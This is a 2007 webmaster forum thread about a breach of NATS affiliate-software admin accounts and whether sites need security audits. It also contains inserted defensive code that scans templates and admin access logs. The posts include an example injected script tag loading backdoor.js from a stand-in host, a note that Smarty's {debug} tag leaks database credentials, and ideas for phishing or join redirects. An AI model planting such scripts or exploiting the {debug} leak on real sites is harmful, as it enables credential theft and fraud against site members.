patched & safe NATS programs

  • HunkyLuke
    Virgin by request ;)
    • Feb 2002
    • 1924

    #1

    patched & safe NATS programs

    Here is the list of affiliate sites that I have heard from so far who have confirmed their NATS installations have been "patched", ie, all recommended safety precautions have been taken:
    HunkMoney
    IslandDollars
    ZBuckZ
    HapiCash

    Who else? Please add any other affiliate programs that have confirmed they have addressed this issue, as recommended by TMM. Program owners, if you have already taken actions, please let us know here!

    cheers,
    Luke
    Last edited by HunkyLuke; 12-26-2007, 10:28 AM.
  • TheDoc
    Too lazy to set a custom title
    • Jul 2001
    • 13827

    #2
    You can add all NATS programs to that list now.

    Once TMM found out about this they went in and changed the PW's on programs they had access for. They didn't keep the new info, just fyi.

    Everyone else would have had IP protection in place or previously had removed/changed the TMM account details. Meaning the data was already secure.
    ~TheDoc - ICQ7765825
    It's all disambiguation


    • HunkyLuke
      Virgin by request ;)
      • Feb 2002
      • 1924

      #3
      Thanks TheDoc, I must have missed that in all the threads recently!

      cheers,
      Luke


      • uno
        RIP Dodger. BEST.CAT.EVER
        • Dec 2002
        • 18450

        #4
        Originally posted by TheDoc
        You can add all NATS programs to that list now.

        Once TMM found out about this they went in and changed the PW's on programs they had access for. They didn't keep the new info, just fyi.

        Everyone else would have had IP protection in place or previously had removed/changed the TMM account details. Meaning the data was already secure.
        PanchoDog has had IP protection for a very long time.
        -uno
        icq: 111-914
        CrazyBabe.com - porn art
        MojoHost - For all your hosting needs, present and future. Tell them I sent ya!


        • TheDoc
          Too lazy to set a custom title
          • Jul 2001
          • 13827

          #5
          Originally posted by uno
          PanchoDog has had IP protection for a very long time.
          Good stuff.. I really think a great deal of clients did use the protection.

          I was avoiding listing all the people that I know did use the IP protection. Ya miss a few people and the ICQ's of butt hurt people start
          ~TheDoc - ICQ7765825
          It's all disambiguation


          • SmokeyTheBear
            ►SouthOfHeaven
            • Jun 2004
            • 28609

            #6
            wait wait wait , gotta set things straight here.

            In my opinion no sponsors are safe until they have had a security audit.

            The nats admins usernames were stolen, there are hundreds of places the hacker could have injected code that is still UNACTIVATED. regardless of if the admins have been removed, ip's locked down and patched up..

            just because you are patched, doesn't mean you are safe. I suggest all sponsors who want to make sure not only for themselves but for their affiliates should clarify if they had a security audit and what was done in the audit. I suggest that any nats sponsor that was compromised using the nats admins passwords should probably send the bill to nats for the security audit or ask nats to supply you one. but this is only my opinion, i have no idea if nats plans on paying for these.
            hatisblack at yahoo.com


            • TheDoc
              Too lazy to set a custom title
              • Jul 2001
              • 13827

              #7
              Smokey, I thought about this more.. I agree, but overall... Not really.

              They can't run/upload/execute anything without it being a plugin / script uploaded via FTP first. You can't upload or add anything to the system via the NATS admin. Smarty won't run php, can't do includes, won't do redirects.. NATS locked down several exploitable parts of smarty already.

              So other than direct join template changes or an iframe exploit in the admin templates (which would take 2 seconds to look and see).. I don't really think they could do much damage this way.

              Now, they could have deleted members, webmasters, templates, sites, programs, etc.. A small issue needless to say.
              ~TheDoc - ICQ7765825
              It's all disambiguation


              • Theo
                HAL 9000
                • May 2001
                • 34515

                #8
                TheDoc is right on this.


                • chri$tian
                  Confirmed User
                  • Aug 2003
                  • 2468

                  #9
                  Our IP protection to the admin of NATS was put in place early last week before this news broke, but I agree with TheDoc.. More needs to be done.
                  http://www.3dsex.com


                  • borked
                    Totally Borked
                    • Feb 2005
                    • 6284

                    #10
                    Originally posted by Soul_Rebel
                    TheDoc is right on this.
                    Nope, Smokey is right on this one.

                    for those of you that don't know Smarty, the template engine for NATS, all one needs to do is add
                    {debug}
                    to any template and you've given away a *lot* of info.

                    A *FULL* security audit is required by *EVERY* programme that runs NATS. Period.

                    For coding work - hit me up on andy // borkedcoder // com
                    (consider figuring out the email as test #1)



                    All models are wrong, but some are useful. George E.P. Box. p202


                    • borked
                      Totally Borked
                      • Feb 2005
                      • 6284

                      #11
                      Originally posted by AtlasChris
                      Our IP protection to the admin of NATS was put in place early last week before this news broke, but I agree with TheDoc.. More needs to be done.
                      I know you guys lock down your MySQL to specific IPs - not everyone is so tight.

                      For coding work - hit me up on andy // borkedcoder // com
                      (consider figuring out the email as test #1)



                      All models are wrong, but some are useful. George E.P. Box. p202


                      • SmokeyTheBear
                        ►SouthOfHeaven
                        • Jun 2004
                        • 28609

                        #12
                        Originally posted by TheDoc
                        So other than direct join template changes or an iframe exploit in the admin templates (which would take 2 seconds to look and see)..
                        it would only take 2 seconds to look and see obvious non-human logins in the nats admin but they missed that for months right .. if you don't look for things they are hard to see .. if they were smart enough to steal the master nats passwd list and build software to remotely retrieve data on a daily basis from numerous sponsors , it doesn't seem a far stretch they would do something as simple as edit a template and drop in a few backdoor scripts in case the admin ever found out the password list was compromised. in fact i would think that would be the very very first thing they would do..
                        hatisblack at yahoo.com


                        • TheDoc
                          Too lazy to set a custom title
                          • Jul 2001
                          • 13827

                          #13
                          Originally posted by borked
                          {debug}
                          This tells you about errors and what smarty calls to make. You can not call everything from the debug menu into a nats template. It isn't a security issue of any kind.

                          MYSQL has nothing to do with this, nor protecting mysql. The IP lock feature is within the Admin area and instantly stopped this attack from happening.


                          Originally posted by SmokeyTheBear
                          it would only take 2 seconds to look and see obvious non-human logins in the nats admin but they missed that for months right .. if you don't look for things they are hard to see .. if they were smart enough to steal the master nats passwd list and build software to remotely retrieve data on a daily basis from numerous sponsors , it doesn't seem a far stretch they would do something as simple as edit a template and drop in a few backdoor scripts in case the admin ever found out the password list was compromised. in fact i would think that would be the very very first thing they would do..
                          Looking at the logins vs looking at discolored admin templates which never flip ownership, really stands out in NATS. Logins, not so much.

                          You can't do anything with the templates, you can't execute, upload, backdoor anything. They are nothing more than text files, executed as text/html.

                          The password list is TMM admin accounts on NATS. Not ALL NATS admin accounts or any other admins, webmasters, etc.. Only the TMM admin accounts were breached.
                          Last edited by TheDoc; 12-26-2007, 01:46 PM.
                          ~TheDoc - ICQ7765825
                          It's all disambiguation


                          • SmokeyTheBear
                            ►SouthOfHeaven
                            • Jun 2004
                            • 28609

                            #14
                            Originally posted by TheDoc
                            You can't do anything with the templates, you can't execute, upload, backdoor anything. They are nothing more than text files, executed as text/html..
                            script src=http://secretstuff.com/backdoor.js

                            could be empty right now (i.e unnoticed) and waiting to scoop
                            hatisblack at yahoo.com


                            • TheDoc
                              Too lazy to set a custom title
                              • Jul 2001
                              • 13827

                              #15
                              Originally posted by SmokeyTheBear
                              script src=http://secretstuff.com/backdoor.js

                              could be empty right now (i.e unnoticed) and waiting to scoop
                              What could it do other than run local js on a pc?
                              ~TheDoc - ICQ7765825
                              It's all disambiguation


                              • TheDoc
                                Too lazy to set a custom title
                                • Jul 2001
                                • 13827

                                #16
                                Wait, yeah duh, key stroker.. I can check some programs right fast, most people never touch the admin templates so it really only takes a second to look. And I check the access template since it's the first.

                                Outside of those, unless you point out a different reason, I don't see that this would do anything.
                                ~TheDoc - ICQ7765825
                                It's all disambiguation


                                • SmokeyTheBear
                                  ►SouthOfHeaven
                                  • Jun 2004
                                  • 28609

                                  #17
                                  Originally posted by TheDoc
                                  What could it do other than run local js on a pc?
                                  well it could redirect joins that would be pretty bad.

                                  if it redirected the joins to a carding page that would be even worse.
                                  hatisblack at yahoo.com


                                  • borked
                                    Totally Borked
                                    • Feb 2005
                                    • 6284

                                    #18
                                    Originally posted by TheDoc
                                    This tells you about errors and what smarty calls to make. You can not call everything from the debug menu into a nats template. It isn't a security issue of any kind.

                                    MYSQL has nothing to do with this, nor protecting mysql. The IP lock feature is within the Admin area and instantly stopped this attack from happening.

                                    Oh I'm sorry, maybe I was misreading the $config array output from {debug}

                                    {$config} Array (168)
                                    DB_SERVER => "xxxxxxx"
                                    DB_USER => "xxxxxxx"
                                    DB_PASSWORD => "xxxxxxx"
                                    DB_DB => "xxxxxxx"

                                    My bad, this has nothing to do with mysql at all.

                                    For coding work - hit me up on andy // borkedcoder // com
                                    (consider figuring out the email as test #1)



                                    All models are wrong, but some are useful. George E.P. Box. p202


                                    • TheDoc
                                      Too lazy to set a custom title
                                      • Jul 2001
                                      • 13827

                                      #19
                                      Originally posted by SmokeyTheBear
                                      well it could redirect joins that would be pretty bad.

                                      if it redirected the joins to a carding page that would be even worse.
                                      ok, they do need to be checked.. But prob more focused on the join forms, give admin templates a quick one over, and hand check the access template.

                                      Either way though, nobody is uploading, adding code, creating a backdoor, etc through the NATS admin. However, nasty shit can be done either way.
                                      ~TheDoc - ICQ7765825
                                      It's all disambiguation
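
Added example, not part of any poster's message and not NATS or Smarty code: a small audit script for the template checks discussed in the posts above. It flags the Smarty `{debug}` tag and any `<script>`, `<iframe>` or `<form>` whose URL points at a host outside an allow list. The `.tpl` extension, default Smarty delimiters, host names and sample template are assumptions constructed for illustration.

```python
"""Audit Smarty-style templates for the changes discussed in this thread.

Flags:
  * {debug} tags (the debug console dumps assigned template variables)
  * <script>/<iframe> src and <form> action values that point at a host
    which is not on the program's allow list
Relative URLs and URLs built from template variables are not resolved and
are treated as local; review those by hand.
"""
import re
import sys
from pathlib import Path
from urllib.parse import urlparse

# Assumption: hosts the program legitimately uses (constructed names).
ALLOWED_HOSTS = {"join.example-program.test", "static.example-program.test"}

# {debug} or {debug output="html"}; does not match {$debug} or {debug_foo}.
DEBUG_TAG = re.compile(r"\{\s*debug\b[^}]*\}", re.IGNORECASE)

# src=/action= on script, iframe and form tags; the value may be
# double-quoted, single-quoted or unquoted (src=http://host/x.js).
URL_ATTR = re.compile(
    r"<\s*(script|iframe|form)\b[^>]*?\b(?:src|action)\s*=\s*"
    r"(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE,
)


def _line_of(text, offset):
    """1-based line number of a character offset."""
    return text.count("\n", 0, offset) + 1


def scan_text(text, allowed_hosts=ALLOWED_HOSTS):
    """Return sorted (line_no, kind, detail) findings for one template."""
    findings = []
    for m in DEBUG_TAG.finditer(text):
        findings.append((_line_of(text, m.start()), "debug-tag", m.group(0)))
    for m in URL_ATTR.finditer(text):
        tag = m.group(1).lower()
        url = m.group(2) or m.group(3) or m.group(4) or ""
        # urlparse also handles protocol-relative URLs such as //host/path.
        host = (urlparse(url).hostname or "").lower()
        if host and host not in allowed_hosts:
            findings.append((_line_of(text, m.start()), f"external-{tag}", url))
    return sorted(findings)


def scan_tree(root, allowed_hosts=ALLOWED_HOSTS, pattern="*.tpl"):
    """Scan every template under root; return {path: findings} for hits only."""
    report = {}
    for path in sorted(Path(root).rglob(pattern)):
        hits = scan_text(path.read_text(errors="replace"), allowed_hosts)
        if hits:
            report[str(path)] = hits
    return report


# Constructed sample, not a real NATS template.
SAMPLE_TEMPLATE = """\
<html><body>
{* constructed sample *}
<form method="post" action="https://join.example-program.test/signup.php">
  <input name="email">
</form>
<script src=http://unknown-host.test/x.js></script>
<script src="/js/local.js"></script>
{debug}
<form action='//billing.unknown-host.test/pay'>
</body></html>
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Usage: python audit_templates.py /path/to/templates
        for path, hits in scan_tree(sys.argv[1]).items():
            for line_no, kind, detail in hits:
                print(f"{path}:{line_no}: {kind}: {detail}")
    else:
        for line_no, kind, detail in scan_text(SAMPLE_TEMPLATE):
            print(f"sample:{line_no}: {kind}: {detail}")
```

A scan like this only covers the template text; comparing each template against a known-good copy is still needed to catch edits that do not match these patterns.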


                                      • SmokeyTheBear
                                        ►SouthOfHeaven
                                        • Jun 2004
                                        • 28609

                                        #20
                                        Originally posted by TheDoc
                                        ok, they do need to be checked.. But prob more focused on the join forms, give admin templates a quick one over, and hand check the access template.
                                        before they are given the all clean.

                                        I don't wanna give away too much but fact is the basics got overlooked or this would have been noticed by both nats and the sponsors themselves ages ago ( or was and was ignored ) if someone was smart they likely knew this wouldn't last forever ( admin access ) , place a small js for a fake "nats update your password security alert" in the admin section , so when sponsors learn of this right now like they have they would think "oh gee this must be legit" wham bam recompromised
                                        hatisblack at yahoo.com


                                        • AlienQ - BANNED FOR LIFE
                                          best designer on GFY
                                          • Mar 2003
                                          • 30307

                                          #21
                                          I think this subject is....


                                          • will76
                                            Making $$$$ w/ ClickCash
                                            • May 2003
                                            • 18037

                                            #22
                                            getting TheDoc to be careful on this issue seems to be near impossible. He has been downplaying this from day 1 when he was saying he "seems to believe that only emails were stolen". This thread is a perfect example of someone being too quick to give the "all clear" and wanting the issue to be downplayed and to go away. If smokey wouldn't have convinced him after several posts, people would be reading the doc's initial posts here saying that all NATS programs were now safe. Another assumption he obviously knows nothing about. I'm not bashing on NATS but i agree with Smokey it would be wise to have an audit of your server to double check everything, whereas the doc would tell it is all fine, nothing to worry about.
                                            Last edited by will76; 12-26-2007, 02:21 PM.
                                            ICQ: 86364801 Email: will [at] innovativeassets [dot] com

                                            PROGRAM SHIT LIST - DO NOT PROMOTE (click link for gfy thread)
                                            FNCash | Media Revenue


                                            • TheDoc
                                              Too lazy to set a custom title
                                              • Jul 2001
                                              • 13827

                                              #23
                                              Originally posted by will76
                                              getting TheDoc to be careful on this issue seems to be near impossible. He has been downplaying this from day 1 when he was saying he "seems to believe that only emails were stolen". This thread is a perfect example of someone being too quick to give the "all clear" and wanting the issue to be downplayed and to go away. If smokey wouldn't have convinced him after several posts, people would be reading the doc's initial posts here saying that all NATS programs were now safe. Another assumption he obviously knows nothing about.
                                              I'm talking to Smokey over ICQ about this well before this post was made. I haven't given the all clear to anything. I'm here to learn so I can educate my clients and NATS on what to do.. Please don't confuse me with some jackass.

                                              I still DON'T think a program needs to do a check. But to be safe they might as well. With the console issue or 1000 other possible problems, the fact remains they ONLY got email / member data.


                                              Don't pull me into your little twisted post games or I will eat you alive and spit your ass back out.
                                              Last edited by TheDoc; 12-26-2007, 02:24 PM.
                                              ~TheDoc - ICQ7765825
                                              It's all disambiguation


                                              • WiredGuy
                                                Pounding Googlebot
                                                • Aug 2002
                                                • 34512

                                                #24
                                                Originally posted by AlienQ
                                                I think this subject is....

                                                I think it's just beginning.
                                                WG
                                                I play with Google.


                                                • TheDoc
                                                  Too lazy to set a custom title
                                                  • Jul 2001
                                                  • 13827

                                                  #25
                                                  Originally posted by borked
                                                  Oh I'm sorry, maybe I was misreading the $config array output from {debug}

                                                  {$config} Array (168)
                                                  DB_SERVER => "xxxxxxx"
                                                  DB_USER => "xxxxxxx"
                                                  DB_PASSWORD => "xxxxxxx"
                                                  DB_DB => "xxxxxxx"

                                                  My bad, this has nothing to do with mysql at all.
                                                  Now back to you.. Interesting and you are correct.

                                                  Can it be removed and still have the debug console?

                                                  I went in and checked 5 people, only 2 of us (me included) have the debug on. I don't remember turning mine on but I am going to get my host to tell me how to turn it on/off.

                                                  I would bet though, now that you pointed this out, more changes will be made. That damn console is handy but that could be deadly.

                                                  Again, pointing out at how bad it could have been - vs what it really was.
                                                  ~TheDoc - ICQ7765825
                                                  It's all disambiguation


                                                  • will76
                                                    Making $$$$ w/ ClickCash
                                                    • May 2003
                                                    • 18037

                                                    #26
                                                    Originally posted by TheDoc
                                                    I'm talking to Smokey over ICQ about this well before this post was made. I haven't given the all clear to anything. I'm here to learn so I can educate my clients and NATS on what to do.. Please don't confuse me with some jackass.

                                                    I still DON'T think a program needs to do a check. But to be safe they might as well. With the console issue or 1000 other possible problems, the fact remains they ONLY got email / member data.


                                                    Don't pull me into your little twisted post games or I will eat you alive and spit your ass back out.
                                                    game? here i am telling people to err on caution and you are telling them the complete opposite.


                                                    TITLE OF THIS THREAD:
                                                    patched & safe NATS programs
                                                    your reply:
                                                    Originally posted by TheDoc
                                                    You can add all NATS programs to that list now.
                                                    RIGHT FUCKING THERE you say you can add all programs to the safe list. Then after several of smokey's posts you post:
                                                    ok, they do need to be checked..
                                                    Now you are saying

                                                    I still DON'T think a program needs to do a check.
                                                    So you want to resort to personal attacks / threats now? No need for me to play games or twist things when all I need to do is quote you.
                                                    ICQ: 86364801 Email: will [at] innovativeassets [dot] com

                                                    PROGRAM SHIT LIST - DO NOT PROMOTE (click link for gfy thread)
                                                    FNCash | Media Revenue


                                                    • TheDoc
                                                      Too lazy to set a custom title
                                                      • Jul 2001
                                                      • 13827

                                                      #27
                                                      Yes, Will76, NATS has been "Patched and is now Safe".. That is 100% correct.

                                                      Please take your drama bullshit to another thread and let us adults conduct business.
                                                      ~TheDoc - ICQ7765825
                                                      It's all disambiguation


                                                      • JOKER
                                                        Facit Omnia Voluntas
                                                        • Apr 2003
                                                        • 2105

                                                        #28
                                                        Originally posted by TheDoc
                                                        I still DON'T think a program needs to do a check. But to be safe they might as well.
                                                        And I think giving programs / affiliates a false sense of security might not be the best idea, but of course that's just me.

                                                        Originally posted by TheDoc
                                                        With the console issue or 1000 other possible problems, the fact remains they ONLY got email / member data.
                                                        John himself stated that they had access to everything an admin would have access to - yet you're saying it's a FACT that they only got email / member data - how can you be so sure, have you done a full security audit to programs that you have access to? How can you be so sure, if you don't know what these guys are really capable of?

                                                        No offense, really - and believe me, I'd like to see this go away as fast as every other webmaster / program owner as well, it's just that you know, better be safe and 100% sure than sorry.

                                                        It's great that there is work being done and that you're a part of it
                                                        Facilitation - BizDev - Traffic - Consulting - Marketing
                                                        Skype: jokerempire | Silent Circle: joker


                                                        • will76
                                                          Making $$$$ w/ ClickCash
                                                          • May 2003
                                                          • 18037

                                                          #29
                                                          Originally posted by TheDoc
                                                          Yes, Will76, NATS has been "Patched and is now Safe".. That is 100% correct.

                                                          Please take your drama bullshit to another thread and let us adults conduct business.
                                                          That's not at question, if NATS is now safe or not. Maybe you should read the title again: NATS PROGRAMS. Someone was asking which programs using NATS were safe. You saw "NATS and SAFE" and you jumped in to say "ALL OF THEM". Obviously you still don't understand the subject of the thread since your reply is NATS has been "Patched and is now Safe".. no one has disputed that. Everyone knows that it was a password list and that NATS deleted the passwords.

                                                          No Drama, and you can continue to reply with insults if you like and try to start a pissing match but I prefer to stick to the topic. Smokey pointed out where people should get their stuff checked. I agree better to be safe and do the right thing. I am just curious why you are so quick to tell people that all programs using NATS on their servers are 100% safe. How do you know that? Did you check everyone's servers as smokey mentioned?
                                                          Last edited by will76; 12-26-2007, 02:47 PM.
                                                          ICQ: 86364801 Email: will [at] innovativeassets [dot] com

                                                          PROGRAM SHIT LIST - DO NOT PROMOTE (click link for gfy thread)
                                                          FNCash | Media Revenue


                                                          • TheDoc
                                                            Too lazy to set a custom title
                                                            • Jul 2001
                                                            • 13827

                                                            #30
                                                            Originally posted by will76
                                                            That's not at question, if NATS is now safe or not. Maybe you should read the title again: NATS PROGRAMS. Someone was asking which programs using NATS were safe. You saw "NATS and SAFE" and you jumped in to say "ALL OF THEM". Obviously you still don't understand the subject of the thread since your reply is NATS has been "Patched and is now Safe".. no one has disputed that. Everyone knows that it was a password list and that NATS deleted the passwords.

                                                            No Drama, and you can continue to reply with insults if you like and try to start a pissing match but I prefer to stick to the topic. Smokey pointed out where people should get their stuff checked. I agree better to be safe and do the right thing. I am just curious why you are so quick to tell people that all programs using NATS on their servers are 100% safe. How do you know that? Did you check everyone's servers as smokey mentioned?
                                                            I think the question asked was "have confirmed their NATS installations have been "patched", ie, all recommended safety precautions have been taken"

                                                            No reason to twist this, the answer again is 100% YES! All NATS programs have had all recommended safety precautions taken.

                                                            Everything else is how to IMPROVE on it and find more possible holes that could be exploited.

                                                            And I did agree with Smokey, and I agreed that people should check the installs. But I do not think or agree that they will find any problems due to the fact that a human didn't enter the programs, but rather a bot, which pulled information from reports. So even the debug screen is pointless, but that doesn't mean it isn't something that shouldn't be addressed for future problems.


                                                            And with you, I didn't say "all clear" as you quoted me saying. So if you want to twist my words I will continue to bash you.
                                                            ~TheDoc - ICQ7765825
                                                            It's all disambiguation


                                                            • TheDoc
                                                              Too lazy to set a custom title
                                                              • Jul 2001
                                                              • 13827

                                                              #31
                                                              Originally posted by JOKER | JOKEREMPIRE Inc.
                                                              And I think giving programs / affiliates a false sense of security might not be the best idea, but of course that's just me.
                                                              The NATS programs that had been breached are now secure, that isn't false.



                                                              Originally posted by JOKER | JOKEREMPIRE Inc.
                                                              John himself stated that they had access to everything an admin would have access to - yet you're saying it's a FACT that they only got email / member data - how can you be so sure, have you done a full security audit to programs that you have access to? How can you be so sure, if you don't know what these guys are really capable of?
                                                              It was a bot, going in and pulling, it appears, 5 reports from the admin/webmaster cvs reports. These reports pull member and webmaster data when transactions come through. I think this is why Webmaster baited emails were hit harder than member emails. Harder to see who is fresh and who isn't with Members, without running an sql query.

                                                              Originally posted by JOKER | JOKEREMPIRE Inc.
                                                              No offense, really - and believe me, I'd like to see this go away as fast as every other webmaster / program owner as well, it's just that you know, better be safe and 100% sure than sorry.

                                                              It's great that there is work being done and that you're a part of it
                                                              This needed to happen, NATS needed to improve its security. It doesn't need all these people that have never used NATS telling Webmasters what they view the problem is.

                                                              So when people are saying it isn't secure, well.. You are right, but neither is any other affiliate program for that matter, or Google, or anyone. So nobody can ever give the 100% all clear vote, we can only state what we know....

                                                              That NATS is clear of the issue it had and we should all move on and start making more money.
                                                              Last edited by TheDoc; 12-26-2007, 03:33 PM.
                                                              ~TheDoc - ICQ7765825
                                                              It's all disambiguation


                                                              • BluMedia
                                                                Confirmed User
                                                                • Dec 2002
                                                                • 3973

                                                                #32
                                                                We took action as soon as we heard about the issue. Add IntenseCash to that list.

                                                                Mark
                                                                IntenseCash - If you can't convert us then you might want to look for a new job
                                                                .
                                                                BrokeStraightBoys.com converting 1:124 stats counted by Nats


                                                                • SkeetSkeet
                                                                  Confirmed User
                                                                  • Oct 2005
                                                                  • 5404

                                                                  #33
                                                                  we are good to go www.starlightbucks.com

                                                                  ICQ 283633188


                                                                  • Trixxxia
                                                                    Confirmed User
                                                                    • Aug 2004
                                                                    • 5600

                                                                    #34
                                                                    MassiveDollars (and all clients of our host) have IP protection. It can be a pain in the butt sometimes but now I'm sure everyone is GLADLY going to grin rather than growl when they need to get an IP authorized.

                                                                    Despite knowing we are protected, we meticulously went through all IPs that accessed as admins to make sure everyone checked out and matched. All good there.

                                                                    Smokey, borked, quantum-x (in some other threads) and TheDoc - thanks for using your collective brains & experience to foresee any 'possible' issues and giving indications of what to look out for. I personally appreciate it and sleep better at night knowing I've dotted my 'i's and crossed my 't's - EVEN if we were protected. Like JokerEmpire said - Better safe than sorry.
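The check described in #34 (going through every IP that accessed as admin and matching it against the authorized list), as an added example that is not part of the thread and not NATS code. It assumes a combined-format web server access log; the `/admin/` prefix, report paths, user names and addresses are constructed placeholders.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed allowlist and log lines (documentation address ranges), not real data.
ALLOWED_NETS = ["203.0.113.0/28", "198.51.100.7/32"]
ADMIN_PREFIX = "/admin/"  # hypothetical path of the admin area
SAMPLE_LOG = """\
203.0.113.5 - admin1 [26/Dec/2007:09:12:01 -0500] "GET /admin/index.php HTTP/1.1" 200 5120
198.51.100.7 - admin2 [26/Dec/2007:09:40:44 -0500] "POST /admin/settings.php HTTP/1.1" 200 812
192.0.2.44 - support [26/Dec/2007:03:02:10 -0500] "GET /admin/report.php?type=members&format=csv HTTP/1.1" 200 884211
192.0.2.44 - support [26/Dec/2007:03:02:12 -0500] "GET /admin/report.php?type=webmasters&format=csv HTTP/1.1" 200 120433
192.0.2.44 - - [26/Dec/2007:03:02:15 -0500] "GET /index.php HTTP/1.1" 200 2048
203.0.113.200 - admin1 [26/Dec/2007:11:05:33 -0500] "GET /admin/index.php HTTP/1.1" 403 199
not a log line
"""
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def audit_admin_access(log_text, allowed_nets, admin_prefix=ADMIN_PREFIX):
    """Return ({ip: [hits]}, unparsed_lines) for admin requests from outside the allowlist."""
    nets = [ipaddress.ip_network(n) for n in allowed_nets]
    offenders, unparsed = defaultdict(list), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            if line.strip():
                unparsed.append(line)  # keep for manual review instead of dropping
            continue
        if not m["path"].startswith(admin_prefix):
            continue
        try:
            ip = ipaddress.ip_address(m["ip"])
        except ValueError:
            unparsed.append(line)
            continue
        if any(ip in net for net in nets):
            continue
        # "served" separates requests the server answered (2xx) from ones it refused.
        offenders[str(ip)].append({"user": m["user"], "time": m["ts"], "path": m["path"],
                                   "served": m["status"].startswith("2")})
    return dict(offenders), unparsed

if __name__ == "__main__":
    hits, bad = audit_admin_access(SAMPLE_LOG, ALLOWED_NETS)
    for ip, reqs in hits.items():
        print(ip, len(reqs), "admin requests,", sum(r["served"] for r in reqs), "served")
```

Requests that were served to an address outside the list are the ones to investigate first; refused ones show the IP restriction doing its job.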
